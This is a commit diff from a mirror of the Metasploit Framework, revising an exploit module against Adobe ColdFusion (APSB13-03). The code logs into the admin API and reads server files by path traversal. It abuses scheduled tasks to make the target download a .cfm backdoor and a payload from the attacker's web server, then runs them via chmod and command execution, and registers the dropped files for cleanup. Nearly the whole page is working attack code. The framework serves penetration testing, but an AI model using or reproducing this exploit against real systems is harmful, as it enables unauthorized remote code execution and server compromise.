infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Addressed feedback from PR#1717

bug/bundler_fix
Jon Hart 2013-04-16 19:00:26 -07:00
parent 0d2746fb4c
commit 83ec9757ec
1 changed files with 16 additions and 51 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

67
modules/exploits/multi/http/adobe_coldfusion_apsb13_03.rb
View File

@ -13,6 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::FileDropper
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -97,6 +98,10 @@ class Metasploit3 < Msf::Exploit::Remote
# login # login
cf_cookies = login cf_cookies = login
# relative to where we operate during the exploit,
# where is the CFIDE directory?
@cf_root = "../../wwwroot/CFIDE/"
# if we managed to login, get the listener ready # if we managed to login, get the listener ready
datastore['URIPATH'] = rand_text_alphanumeric(6) datastore['URIPATH'] = rand_text_alphanumeric(6)
if (datastore['SRVHOST'] == "0.0.0.0") if (datastore['SRVHOST'] == "0.0.0.0")
@ -113,8 +118,8 @@ class Metasploit3 < Msf::Exploit::Remote
# which technique (cmd, payload) the user wants # which technique (cmd, payload) the user wants
input_exec = srv_uri + "/#{datastore['URIPATH']}-e" input_exec = srv_uri + "/#{datastore['URIPATH']}-e"
output_exec = "#{datastore['URIPATH']}-e.cfm" output_exec = "#{datastore['URIPATH']}-e.cfm"
register_file_for_cleanup @cf_root + output_exec
schedule_drop cf_cookies, input_exec, output_exec schedule_drop cf_cookies, input_exec, output_exec
if datastore['CMD'] and not datastore['CMD'].empty? if datastore['CMD'] and not datastore['CMD'].empty?
# now that the coldfusion exec is on disk, execute it, # now that the coldfusion exec is on disk, execute it,
# passing in the command and arguments # passing in the command and arguments
@ -124,35 +129,21 @@ class Metasploit3 < Msf::Exploit::Remote
else else
# drop the payload # drop the payload
input_payload = srv_uri + "/#{datastore['URIPATH']}-p" input_payload = srv_uri + "/#{datastore['URIPATH']}-p"
output_payload = "#{datastore['URIPATH']}-p" output_payload = "#{datastore['URIPATH']}-p.bat"
register_file_for_cleanup @cf_root + output_payload
schedule_drop cf_cookies, input_payload, output_payload schedule_drop cf_cookies, input_payload, output_payload
# make the payload executable # make the payload executable
# XXX: windows? # XXX: windows?
execute output_exec, 'chmod', "755 ../../wwwroot/CFIDE/#{output_payload}" execute output_exec, 'chmod', "755 #{@cf_root}#{output_payload}"
# execute the payload # execute the payload
execute output_exec, "../../wwwroot/CFIDE/#{output_payload}" execute output_exec, "#{@cf_root}#{output_payload}"
end end
handler handler
end end
def execute(cfm=nil, cmd=nil, args='') def execute(cfm=nil, cmd=nil, args='')
uri = "/CFIDE/" + cfm + "?cmd=#{cmd}&args=#{Rex::Text::uri_encode args}" uri = "/CFIDE/" + cfm + "?cmd=#{cmd}&args=#{Rex::Text::uri_encode args}"
send_request_raw( { 'uri' => uri, 'method' => 'GET' }, 25 ) send_request_cgi( { 'uri' => uri, 'method' => 'GET' }, 25 )
end
def on_new_session(client)
return
# TODO: cleanup
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
@files.each do |file|
client.fs.file.rm("#{file}")
end
else
@files.each do |file|
client.shell_command_token("rm #{file}")
end
end
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
@ -179,30 +170,6 @@ class Metasploit3 < Msf::Exploit::Remote
cookies.to_a.map { |a| a.join '=' }.join '; ' cookies.to_a.map { |a| a.join '=' }.join '; '
end end
# this doesn't actually work
def twiddle_csrf(cookies=nil, enable=false)
mode = (enable ? "Enabling" : "Disabling")
print_status "#{mode} CSRF protection"
params = {
'SessEnable' => enable.to_s,
}
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, "/CFIDE/administrator/settings/memoryvariables.cfm"),
'method' => 'POST',
'connection' => 'TE, close',
'cookie' => build_cookie_header(cookies),
'vars_post' => params,
})
if res
if res.body =~ /SessionManagement should/
print_error "Error #{mode} CSRF"
end
else
print_error "No response while #{mode} CSRF"
end
end
# Using the provided +cookies+, schedule a ColdFusion task # Using the provided +cookies+, schedule a ColdFusion task
# to request content from +input_uri+ and drop it in +output_path+ # to request content from +input_uri+ and drop it in +output_path+
def schedule_drop(cookies, input_uri, output_path) def schedule_drop(cookies, input_uri, output_path)
@ -227,7 +194,6 @@ class Metasploit3 < Msf::Exploit::Remote
token = res.body.scan(/<input type="hidden" name="csrftoken" value="([^\"]+)"/).flatten.first token = res.body.scan(/<input type="hidden" name="csrftoken" value="([^\"]+)"/).flatten.first
unless token unless token
print_warning "Empty CSRF token found -- either CSRF is disabled (good) or we couldn't get one (bad)" print_warning "Empty CSRF token found -- either CSRF is disabled (good) or we couldn't get one (bad)"
#twiddle_csrf cookies, false
token = '' token = ''
end end
else else
@ -250,7 +216,7 @@ class Metasploit3 < Msf::Exploit::Remote
# pick a unique task ID # pick a unique task ID
task_id = SecureRandom.uuid task_id = SecureRandom.uuid
# drop the backdoor in the CFIDE directory so it can be executed # drop the backdoor in the CFIDE directory so it can be executed
publish_file = '../../wwwroot/CFIDE/' + output_path publish_file = "#{@cf_root}#{output_path}"
# pick a start date. This must be in the future, so pick # pick a start date. This must be in the future, so pick
# one sufficiently far ahead to account for time zones, # one sufficiently far ahead to account for time zones,
# improper time keeping, solar flares, drift, etc. # improper time keeping, solar flares, drift, etc.
@ -302,7 +268,6 @@ class Metasploit3 < Msf::Exploit::Remote
{ {
'uri' => normalize_uri(target_uri.path, scheduleedit_path), 'uri' => normalize_uri(target_uri.path, scheduleedit_path),
'method' => 'POST', 'method' => 'POST',
'connection' => 'TE, close',
'cookie' => build_cookie_header(cookie_hash), 'cookie' => build_cookie_header(cookie_hash),
'vars_post' => params, 'vars_post' => params,
}) })
@ -328,18 +293,15 @@ class Metasploit3 < Msf::Exploit::Remote
{ {
'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?runtask=#{task_id}&csrftoken=#{token}&group=default&mode=server", 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?runtask=#{task_id}&csrftoken=#{token}&group=default&mode=server",
'method' => 'GET', 'method' => 'GET',
'connection' => 'TE, close',
'cookie' => build_cookie_header(cookie_hash), 'cookie' => build_cookie_header(cookie_hash),
}) })
#twiddle_csrf cookies, true
if datastore['DELETE_TASK'] if datastore['DELETE_TASK']
print_status "Removing task #{task_id}" print_status "Removing task #{task_id}"
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?action=delete&task=#{task_id}&csrftoken=#{token}", 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?action=delete&task=#{task_id}&csrftoken=#{token}",
'method' => 'GET', 'method' => 'GET',
'connection' => 'TE, close',
'cookie' => build_cookie_header(cookie_hash), 'cookie' => build_cookie_header(cookie_hash),
}) })
end end
@ -397,7 +359,6 @@ class Metasploit3 < Msf::Exploit::Remote
{ {
'uri' => normalize_uri(target_uri.path, %w(CFIDE adminapi administrator.cfc)), 'uri' => normalize_uri(target_uri.path, %w(CFIDE adminapi administrator.cfc)),
'method' => 'POST', 'method' => 'POST',
'connection' => 'TE, close',
'vars_post' => { 'vars_post' => {
'method' => 'login', 'method' => 'login',
'adminUserId' => user, 'adminUserId' => user,
@ -620,6 +581,8 @@ class Metasploit3 < Msf::Exploit::Remote
false false
end end
# Read the file located at +path+ using the provided ColdFusion +cookies+,
# returning the contents of the file if found, an empty string otherwise
def traverse_read(path, cookies) def traverse_read(path, cookies)
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
uri << "CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=" uri << "CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path="
@ -633,6 +596,8 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if res and res.body if res and res.body
res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '') res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '')
else
return ""
end end
end end
end end